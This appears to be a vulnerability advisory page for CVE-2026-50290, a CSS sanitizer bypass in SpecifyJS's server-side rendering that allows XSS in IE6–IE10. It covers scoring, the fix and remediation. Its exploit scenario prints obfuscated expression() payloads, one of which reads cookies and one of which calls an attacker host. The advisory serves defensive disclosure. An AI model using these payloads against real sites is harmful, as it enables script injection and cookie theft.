Skip to main content

SpecifyJS CVE-2026-50290

MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-02 https://github.com/asymmetric-effort/specifyjs GHSA-93q6-wwjh-jc6h
Share

Severity by source

vuln.today AI
4.7 MEDIUM

AC:H reflects the mandatory legacy browser prerequisite; S:C applies because XSS crosses from server rendering into the victim browser context; A:N as availability is unaffected.

3.1 AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:H/AT:P/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N

Estimated by vuln.today — no official severity rating has been published for this CVE yet.

Lifecycle Timeline

1
Analysis Generated
Jul 02, 2026 - 19:32 vuln.today

DescriptionCVE.org

Finding

Location: core/src/server/render-to-string.ts:307-311

CSS value sanitization stripped expression( and url(javascript: using simple regex, but could be bypassed with CSS unicode escapes (\65xpression(), null bytes, or CSS comments (exp/**/ression().

Mitigating Factor: These CSS injection vectors only work in legacy browsers (IE6-IE10). SpecifyJS targets modern browsers.

Status

Fixed in v0.2.136 - CSS sanitization now normalizes unicode escapes and strips CSS comments before pattern matching. Also checks for behavior:, -moz-binding, and -o-link patterns.

AnalysisAI

CSS injection sanitization bypass in SpecifyJS's server-side render-to-string function exposes applications to cross-site scripting when the library processes attacker-controlled CSS values. The sanitizer in core/src/server/render-to-string.ts (lines 307-311) used naive regex to block patterns like 'expression(' and 'url(javascript:' without first normalizing the input, allowing bypass via CSS unicode escapes (e.g., \65xpression()), null bytes, or CSS comments (e.g., exp//ression()). …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Supply unicode-escaped CSS payload as user input
Delivery
Application passes input through SpecifyJS render-to-string
Exploit
Regex sanitizer fails to match obfuscated pattern
Install
Malicious CSS emitted into server-rendered HTML
C2
Victim loads page in IE6-IE10
Execute
Browser evaluates CSS expression()
Impact
JavaScript executes in victim browser context

Vulnerability AssessmentAI

Exploitation Exploitation requires two concurrent conditions: first, attacker-controlled input must reach the CSS value sanitization path in render-to-string.ts - meaning the application uses SpecifyJS to render user-supplied or externally sourced CSS values server-side; second, the victim's browser must be Internet Explorer 6, 7, 8, 9, or 10, as CSS expression() evaluation is an IE-proprietary feature not implemented in any modern browser (Chrome, Firefox, Safari, Edge). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment No CVSS vector or EPSS score was provided for this CVE, so all metric assessments are inferred from the description. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker submits input containing a CSS value with a unicode-obfuscated expression such as '\65xpression(alert(document.cookie))' or the comment-interleaved form 'exp/**/ression(fetch(attacker.com))'. SpecifyJS's render-to-string function processes this value, the regex sanitizer fails to recognize the obfuscated pattern, and the raw CSS is emitted into the server-rendered HTML. …
Remediation Upgrade @asymmetric-effort/specifyjs to v0.2.136 or later, which corrects the sanitization logic by normalizing CSS unicode escapes and stripping CSS comments before pattern matching. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-50290 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy